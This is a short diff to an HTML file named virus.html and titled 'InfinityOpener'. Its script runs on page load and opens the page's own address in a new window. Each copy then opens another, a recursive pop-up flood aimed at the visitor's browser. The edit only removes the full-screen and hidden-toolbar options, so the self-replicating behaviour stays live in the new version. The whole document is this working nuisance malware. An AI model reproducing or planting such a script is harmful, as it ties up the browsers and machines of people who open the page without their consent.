--- a/virus.html
+++ b/virus.html
@@ -9,7 +9,7 @@ InfinityOpener
 <title></title>
 <script type="text/javascript">
 function fullScreen(theURL) {
-	window.open(theURL, '', 'fullscreen=yes,scrollbars=auto,menubar=no,toolbar=no,location=no,status=no');
+	window.open(theURL);
 }
 fullScreen(document.location.href);
 </script>
